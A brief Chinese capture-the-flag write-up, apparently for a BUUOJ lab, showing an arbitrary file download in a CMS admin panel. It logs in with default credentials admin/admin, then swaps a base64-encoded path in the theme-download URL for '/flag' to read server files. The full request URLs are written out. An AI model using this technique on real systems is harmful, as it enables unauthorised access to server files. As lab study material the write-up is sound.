知识点:任意文件下载
解题过程:
首先登陆后台/admin.php
后台密码为弱密码
admin/admin
demo/demo
登陆后台后进入设计->自定义->右上角导出主题
?
?
?这里的内容随便填写点击保存即可
保存后会有一个下载链接
?复制这个链接进行查看
?
http://37ceca84-9cc8-492f-be5a-e2890d84bef8.node4.buuoj.cn:81/admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMTIzLnppcA==这里注意到L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMTIzLnppcA==
是base64的格式,于是拿去解密。
解码后为
/var/www/html/system/tmp/theme/default/123.zip发现是文件的路径,此时猜想flag应该在根目录下,于是将/flag拿去base64加密得到
L2ZsYWc=所以修改下载链接得到
http://37ceca84-9cc8-492f-be5a-e2890d84bef8.node4.buuoj.cn:81/admin.php?m=ui&f=downloadtheme&theme=L2ZsYWc=最后放入浏览器中访问下载得到flag(这里压缩包直接重命名为flag.txt)
?